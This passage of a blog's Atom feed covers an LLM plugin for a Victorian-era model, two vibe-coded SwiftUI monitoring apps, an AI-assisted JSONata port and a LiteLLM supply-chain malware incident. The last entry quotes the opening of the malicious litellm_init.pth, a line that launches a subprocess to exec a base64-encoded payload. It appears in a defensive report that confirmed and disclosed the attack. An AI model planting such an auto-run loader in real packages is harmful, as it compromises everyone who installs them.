&lt;p&gt;Trip trained the model using Andrej Karpathy's &lt;a href="https://github.com/karpathy/nanochat"&gt;nanochat&lt;/a&gt;, so I cloned that project, pulled the model weights and told Claude to build a Python script to run the model. Once we had that working (which ended up needing some extra details from the &lt;a href="https://huggingface.co/spaces/tventurella/mr_chatterbox/tree/main"&gt;Space demo source code&lt;/a&gt;) I had Claude &lt;a href="https://llm.datasette.io/en/stable/plugins/tutorial-model-plugin.html"&gt;read the LLM plugin tutorial&lt;/a&gt; and build the rest of the plugin.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://github.com/simonw/llm-mrchatterbox"&gt;llm-mrchatterbox&lt;/a&gt; is the result. Install the plugin like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;llm install llm-mrchatterbox
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The first time you run a prompt it will fetch the 2.05GB model file from Hugging Face. Try that like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;llm -m mrchatterbox "Good day, sir"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Or start an ongoing chat session like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;llm chat -m mrchatterbox
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If you don't have LLM installed you can still get a chat session started from scratch using uvx like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;uvx --with llm-mrchatterbox llm chat -m mrchatterbox
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When you are finished with the model you can delete the cached file using:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;llm mrchatterbox delete-model
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is the first time I've had Claude Code build a full LLM model plugin from scratch and it worked really well. I expect I'll be using this method again in the future.&lt;/p&gt;
&lt;p&gt;I continue to hope we can get a useful model from entirely public domain data. The fact that Trip was able to get this far using nanochat and 2.93 billion training tokens is a promising start.&lt;/p&gt;

&lt;p id="update-31st"&gt;&lt;strong&gt;Update 31st March 2026&lt;/strong&gt;: I had missed this when I first published this piece but Trip has his own &lt;a href="https://www.estragon.news/mr-chatterbox-or-the-modern-prometheus/"&gt;detailed writeup of the project&lt;/a&gt; which goes into much more detail about how he trained the model. Here's how the books were filtered for pre-training:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;First, I downloaded the British Library dataset split of all 19th-century books. I filtered those down to books contemporaneous with the reign of Queen Victoria—which, unfortunately, cut out the novels of Jane Austen—and further filtered those down to a set of books with a optical character recognition (OCR) confidence of .65 or above, as listed in the metadata. This left me with 28,035 books, or roughly 2.93 billion tokes for pretraining data.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Getting it to behave like a conversational model was a lot harder. Trip started by trying to train on plays by Oscar Wilde and George Bernard Shaw, but found they didn't provide enough pairs. Then he tried extracting dialogue pairs from the books themselves with poor results. The approach that worked was to have Claude Haiku and GPT-4o-mini generate synthetic conversation pairs for the supervised fine tuning, which solved the problem but sadly I think dilutes the "no training inputs from after 1899" claim from the original model card.&lt;/p&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/llm"&gt;llm&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/training-data"&gt;training-data&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/local-llms"&gt;local-llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-ethics"&gt;ai-ethics&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude-code"&gt;claude-code&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/andrej-karpathy"&gt;andrej-karpathy&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-assisted-programming"&gt;ai-assisted-programming&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/hugging-face"&gt;hugging-face&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/uv"&gt;uv&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="llm"/><category term="training-data"/><category term="ai"/><category term="local-llms"/><category term="llms"/><category term="ai-ethics"/><category term="claude-code"/><category term="andrej-karpathy"/><category term="ai-assisted-programming"/><category term="generative-ai"/><category term="hugging-face"/><category term="uv"/></entry><entry><title>Quoting Matt Webb</title><link href="https://simonwillison.net/2026/Mar/28/matt-webb/#atom-tag" rel="alternate"/><published>2026-03-28T12:04:26+00:00</published><updated>2026-03-28T12:04:26+00:00</updated><id>https://simonwillison.net/2026/Mar/28/matt-webb/#atom-tag</id><summary type="html">
    &lt;blockquote cite="https://interconnected.org/home/2026/03/28/architecture"&gt;&lt;p&gt;The thing about agentic coding is that agents grind problems into dust. Give an agent a problem and a while loop and - long term - it’ll solve that problem even if it means burning a trillion tokens and re-writing down to the silicon. [...]&lt;/p&gt;
&lt;p&gt;But we want AI agents to solve coding problems quickly and in a way that is maintainable and adaptive and composable (benefiting from improvements elsewhere), and where every addition makes the whole stack better.&lt;/p&gt;
&lt;p&gt;So at the bottom is really great libraries that encapsulate hard problems, with great interfaces that make the “right” way the easy way for developers building apps with them. Architecture!&lt;/p&gt;
&lt;p&gt;While I’m vibing (I call it vibing now, not coding and not vibe coding) while I’m vibing, I am looking at lines of code less than ever before, and thinking about architecture more than ever before.&lt;/p&gt;&lt;/blockquote&gt;
&lt;p class="cite"&gt;&amp;mdash; &lt;a href="https://interconnected.org/home/2026/03/28/architecture"&gt;Matt Webb&lt;/a&gt;, An appreciation for (technical) architecture&lt;/p&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/matt-webb"&gt;matt-webb&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/vibe-coding"&gt;vibe-coding&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/coding-agents"&gt;coding-agents&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-assisted-programming"&gt;ai-assisted-programming&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/agentic-engineering"&gt;agentic-engineering&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/definitions"&gt;definitions&lt;/a&gt;&lt;/p&gt;



</summary><category term="matt-webb"/><category term="ai"/><category term="llms"/><category term="vibe-coding"/><category term="coding-agents"/><category term="ai-assisted-programming"/><category term="generative-ai"/><category term="agentic-engineering"/><category term="definitions"/></entry><entry><title>Quoting Richard Fontana</title><link href="https://simonwillison.net/2026/Mar/27/richard-fontana/#atom-tag" rel="alternate"/><published>2026-03-27T21:11:17+00:00</published><updated>2026-03-27T21:11:17+00:00</updated><id>https://simonwillison.net/2026/Mar/27/richard-fontana/#atom-tag</id><summary type="html">
    &lt;blockquote cite="https://github.com/chardet/chardet/issues/334#issuecomment-4098524555"&gt;&lt;p&gt;FWIW, IANDBL, TINLA, etc., I don’t currently see any basis for concluding that chardet 7.0.0 is required to be released under the LGPL. AFAIK no one including Mark Pilgrim has identified persistence of copyrightable expressive material from earlier versions in 7.0.0 nor has anyone articulated some viable alternate theory of license violation. [...]&lt;/p&gt;&lt;/blockquote&gt;
&lt;p class="cite"&gt;&amp;mdash; &lt;a href="https://github.com/chardet/chardet/issues/334#issuecomment-4098524555"&gt;Richard Fontana&lt;/a&gt;, LGPLv3 co-author, weighing in on the &lt;a href="https://simonwillison.net/2026/Mar/5/chardet/"&gt;chardet relicensing situation&lt;/a&gt;&lt;/p&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/open-source"&gt;open-source&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-ethics"&gt;ai-ethics&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-assisted-programming"&gt;ai-assisted-programming&lt;/a&gt;&lt;/p&gt;



</summary><category term="open-source"/><category term="ai-ethics"/><category term="llms"/><category term="ai"/><category term="generative-ai"/><category term="ai-assisted-programming"/></entry><entry><title>Vibe coding SwiftUI apps is a lot of fun</title><link href="https://simonwillison.net/2026/Mar/27/vibe-coding-swiftui/#atom-tag" rel="alternate"/><published>2026-03-27T20:59:53+00:00</published><updated>2026-03-27T20:59:53+00:00</updated><id>https://simonwillison.net/2026/Mar/27/vibe-coding-swiftui/#atom-tag</id><summary type="html">
    &lt;p&gt;I have a new laptop - a 128GB M5 MacBook Pro, which early impressions show to be &lt;em&gt;very&lt;/em&gt; capable for running good local LLMs. I got frustrated with Activity Monitor and decided to vibe code up some alternative tools for monitoring performance and I'm very happy with the results.&lt;/p&gt;
&lt;p&gt;This is my second experiment with vibe coding macOS apps - the first was &lt;a href="https://simonwillison.net/2026/Feb/25/present/"&gt;this presentation app a few weeks ago&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;It turns out Claude Opus 4.6 and GPT-5.4 are both very competent at SwiftUI - and a full SwiftUI app can fit in a single text file, which means I can use them to spin something up without even opening Xcode.&lt;/p&gt;
&lt;p&gt;I’ve built two apps so far: Bandwidther shows me what apps are using network bandwidth and Gpuer to show me what’s going on with the GPU. At Claude’s suggestion both of these are now menu bar icons that open a panel full of information.&lt;/p&gt;
&lt;h4 id="bandwidther"&gt;Bandwidther&lt;/h4&gt;
&lt;p&gt;I built this app first, because I wanted to see what Dropbox was doing. It looks like this:&lt;/p&gt;
&lt;p&gt;&lt;a target="_blank" rel="noopener noreferrer" href="https://github.com/simonw/bandwidther/raw/main/screenshot.png"&gt;&lt;img src="https://github.com/simonw/bandwidther/raw/main/screenshot.png" alt="Screenshot of Bandwidther macOS app showing two columns: left side displays overall download/upload speeds, a bandwidth graph over the last 60 seconds, cumulative totals, internet and LAN connection counts, and internet destinations; right side shows per-process bandwidth usage sorted by rate with processes like nsurlsessiond, apsd, rapportd, mDNSResponder, Dropbox, and others listed with their individual download/upload speeds and progress bars." style="max-width: 100%;" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I’ve shared &lt;a href="https://gisthost.github.io/?6e06d4724c64c10d1fc3fbe19d9c8575/index.html"&gt;the full transcript&lt;/a&gt; I used to build the first version of the app. My prompts were pretty minimal:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Show me how much network bandwidth is in use from this machine to the internet as opposed to local LAN&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;(My initial curiosity was to see if Dropbox was transferring files via the LAN from my old computer or was downloading from the internet.)&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;mkdir /tmp/bandwidther and write a native Swift UI app in there that shows me these details on a live ongoing basis&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This got me the first version, which proved to me this was worth pursuing further.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;git init and git commit what you have so far&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Since I was about to start adding new features.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Now suggest features we could add to that app, the goal is to provide as much detail as possible concerning network usage including by different apps&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The nice thing about having Claude suggest features is that it has a much better idea for what’s possible than I do.&lt;/p&gt;
&lt;p&gt;We had a bit of back and forth fixing some bugs, then I sent a few more prompts to get to the two column layout shown above:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;add Per-Process Bandwidth, relaunch the app once that is done&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;now add the reverse DNS feature but make sure original IP addresses are still visible too, albeit in smaller typeface&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;redesign the app so that it is wider, I want two columns - the per-process one on the left and the rest on the right&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;OK make it a task bar icon thing, when I click the icon I want the app to appear, the icon itself should be a neat minimal little thing&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The source code and build instructions are available in &lt;a href="https://github.com/simonw/bandwidther"&gt;simonw/bandwidther&lt;/a&gt;.&lt;/p&gt;
&lt;h4 id="gpuer"&gt;Gpuer&lt;/h4&gt;
&lt;p&gt;While I was building Bandwidther in one session I had another session running to build a similar tool for seeing what the GPU was doing. Here’s what I ended up with:&lt;/p&gt;
&lt;p&gt;&lt;a target="_blank" rel="noopener noreferrer" href="https://github.com/simonw/gpuer/raw/main/screenshot.png"&gt;&lt;img src="https://github.com/simonw/gpuer/raw/main/screenshot.png" alt="Screenshot of the Gpuer app on macOS showing memory usage for an Apple M5 Max with 40 GPU cores. Left panel: a large orange &amp;quot;38 GB Available&amp;quot; readout showing usage of 128.0 GB unified memory, &amp;quot;Room for ~18 more large apps before pressure&amp;quot;, a warning banner reading &amp;quot;1.5 GB pushed to disk — system was under pressure recently&amp;quot;, a horizontal segmented bar chart labeled &amp;quot;Where your memory is going&amp;quot; with green, blue, and grey segments and a legend, an explanatory note about GPU unified memory, a GPU Utilization section showing 0%, and a History graph showing Available and GPU Utilization over time as line charts. Right panel: a Memory Footprint list sorted by Memory, showing process names with horizontal pink/purple usage bars and CPU percentage labels beside each entry, covering processes including Dropbox, WebKit, Virtualization, node, Claude Helper, Safari, LM Studio, WindowServer, Finder, and others." style="max-width: 100%;" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Here's &lt;a href="https://gisthost.github.io/?71ffe216ceca8d7da59a07c478d17529"&gt;the transcript&lt;/a&gt;. This one took even less prompting because I could use the in-progress Bandwidther as an example:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;I want to know how much RAM and GPU this computer is using, which is hard because stuff on the GPU and RAM does not seem to show up in Activity Monitor&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This collected information using &lt;code&gt;system_profiler&lt;/code&gt; and &lt;code&gt;memory_pressure&lt;/code&gt; and gave me &lt;a href="https://gisthost.github.io/?71ffe216ceca8d7da59a07c478d17529/page-001.html#msg-2026-03-24T22-13-26-614Z"&gt;an answer&lt;/a&gt; - more importantly it showed me this was possible, so I said:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Look at /tmp/bandwidther and then create a similar app in /tmp/gpuer which shows the information from above on an ongoing basis, or maybe does it better&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;After a few more changes to the Bandwidther app I told it to catch up:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Now take a look at recent changes in /tmp/bandwidther - that app now uses a sys tray icon, imitate that&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This remains one of my favorite tricks for using coding agents: having them &lt;a href="https://simonwillison.net/guides/agentic-engineering-patterns/hoard-things-you-know-how-to-do/#recombining-things-from-your-hoard"&gt;recombine elements&lt;/a&gt; from other projects.&lt;/p&gt;
&lt;p&gt;The code for Gpuer can be found in &lt;a href="https://github.com/simonw/gpuer"&gt;simonw/gpuer&lt;/a&gt; on GitHub.&lt;/p&gt;
&lt;h4 id="you-shouldn-t-trust-these-apps"&gt;You shouldn't trust these apps&lt;/h4&gt;
&lt;p&gt;These two apps are classic vibe coding: I don't know Swift and I hardly glanced at the code they were writing.&lt;/p&gt;
&lt;p&gt;More importantly though, I have very little experience with macOS internals such as the values these tools are measuring. I am completely unqualified to evaluate if the numbers and charts being spat out by these tools are credible or accurate!&lt;/p&gt;
&lt;p&gt;I've added warnings to both GitHub repositories to that effect.&lt;/p&gt;
&lt;p&gt;This morning I caught Gpuer reporting that I had just 5GB of memory left when that clearly wasn't the case (according to Activity Monitor). I &lt;a href="https://gisthost.github.io/?9ae12fff0fecc9a4482c9b02e8599c70/page-001.html#msg-2026-03-27T19-35-35-866Z"&gt;pasted a screenshot into Claude Code&lt;/a&gt; and it &lt;a href="https://github.com/simonw/gpuer/commit/a3cd655f5ccb274d3561e4cbfcc771b0bb7e256a"&gt;adjusted the calculations&lt;/a&gt; and the new numbers &lt;em&gt;look&lt;/em&gt; right, but I'm still not confident that it's reporting things correctly.&lt;/p&gt;
&lt;p&gt;I only shared them on GitHub because I think they're interesting as an example of what Claude can do with SwiftUI.&lt;/p&gt;
&lt;p&gt;Despite my lack of confidence in the apps themselves, I did learn some useful things from these projects:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;A SwiftUI app can get a whole lot done with a single file of code - here's &lt;a href="https://github.com/simonw/gpuer/blob/main/GpuerApp.swift"&gt;GpuerApp.swift&lt;/a&gt; (880 lines) and &lt;a href="https://github.com/simonw/bandwidther/blob/main/BandwidtherApp.swift"&gt;BandwidtherApp.swift&lt;/a&gt; (1063 lines).&lt;/li&gt;
&lt;li&gt;Wrapping various terminal commands in a neat UI with Swift is easily achieved.&lt;/li&gt;
&lt;li&gt;Claude has surprisingly good design taste when it comes to SwiftUI applications.&lt;/li&gt;
&lt;li&gt;Turning an app into a menu bar app is just a few lines of extra code as well.&lt;/li&gt;
&lt;li&gt;You don't need to open Xcode to build this kind of application!&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;These two apps took very little time to build and have convinced me that building macOS apps in SwiftUI is a new capability I should consider for future projects.&lt;/p&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude-code"&gt;claude-code&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/vibe-coding"&gt;vibe-coding&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/coding-agents"&gt;coding-agents&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/macos"&gt;macos&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/swift"&gt;swift&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="ai"/><category term="claude-code"/><category term="llms"/><category term="vibe-coding"/><category term="coding-agents"/><category term="macos"/><category term="swift"/><category term="generative-ai"/></entry><entry><title>We Rewrote JSONata with AI in a Day, Saved $500K/Year</title><link href="https://simonwillison.net/2026/Mar/27/vine-porting-jsonata/#atom-tag" rel="alternate"/><published>2026-03-27T00:35:01+00:00</published><updated>2026-03-27T00:35:01+00:00</updated><id>https://simonwillison.net/2026/Mar/27/vine-porting-jsonata/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://www.reco.ai/blog/we-rewrote-jsonata-with-ai"&gt;We Rewrote JSONata with AI in a Day, Saved $500K/Year&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Bit of a hyperbolic framing but this looks like another case study of &lt;strong&gt;vibe porting&lt;/strong&gt;, this time spinning up a new custom Go implementation of the &lt;a href="https://jsonata.org"&gt;JSONata&lt;/a&gt; JSON expression language - similar in focus to jq, and heavily associated with the &lt;a href="https://nodered.org"&gt;Node-RED&lt;/a&gt; platform.&lt;/p&gt;
&lt;p&gt;As with other vibe-porting projects the key enabling factor was JSONata's existing test suite, which helped build the first working Go version in 7 hours and $400 of token spend.&lt;/p&gt;
&lt;p&gt;The Reco team then used a shadow deployment for a week to run the new and old versions in parallel to confirm the new implementation exactly matched the behavior of the old one.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/agentic-engineering"&gt;agentic-engineering&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/json"&gt;json&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/go"&gt;go&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/vibe-porting"&gt;vibe-porting&lt;/a&gt;&lt;/p&gt;



</summary><category term="generative-ai"/><category term="agentic-engineering"/><category term="json"/><category term="go"/><category term="ai"/><category term="llms"/><category term="vibe-porting"/></entry><entry><title>My minute-by-minute response to the LiteLLM malware attack</title><link href="https://simonwillison.net/2026/Mar/26/response-to-the-litellm-malware-attack/#atom-tag" rel="alternate"/><published>2026-03-26T23:58:22+00:00</published><updated>2026-03-26T23:58:22+00:00</updated><id>https://simonwillison.net/2026/Mar/26/response-to-the-litellm-malware-attack/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://futuresearch.ai/blog/litellm-attack-transcript/"&gt;My minute-by-minute response to the LiteLLM malware attack&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Callum McMahon reported the &lt;a href="https://simonwillison.net/2026/Mar/24/malicious-litellm/"&gt;LiteLLM malware attack&lt;/a&gt; to PyPI. Here he shares the Claude transcripts he used to help him confirm the vulnerability and decide what to do about it. Claude even suggested the PyPI security contact address after confirming the malicious code in a Docker container:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Confirmed&lt;/strong&gt;. Fresh download from PyPI right now in an isolated Docker container:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Inspecting: litellm-1.82.8-py3-none-any.whl
FOUND: litellm_init.pth
SIZE: 34628 bytes
FIRST 200 CHARS:
import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('aW1wb3J0IHN1YnByb2Nlc3MKaW1wb3J0IHRlbXBmaWxl...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The malicious &lt;code&gt;litellm==1.82.8&lt;/code&gt; is &lt;strong&gt;live on PyPI right now&lt;/strong&gt; and anyone installing or upgrading litellm will be infected. This needs to be reported to security@pypi.org immediately.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I was chuffed to see Callum use my &lt;a href="https://github.com/simonw/claude-code-transcripts"&gt;claude-code-transcripts&lt;/a&gt; tool to publish the transcript of the conversation.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=47531967"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude"&gt;claude&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/supply-chain"&gt;supply-chain&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pypi"&gt;pypi&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;&lt;/p&gt;



</summary><category term="security"/><category term="claude"/><category term="generative-ai"/><category term="supply-chain"/><category term="ai"/><category term="pypi"/><category term="llms"/><category term="ai-security-research"/></entry></feed>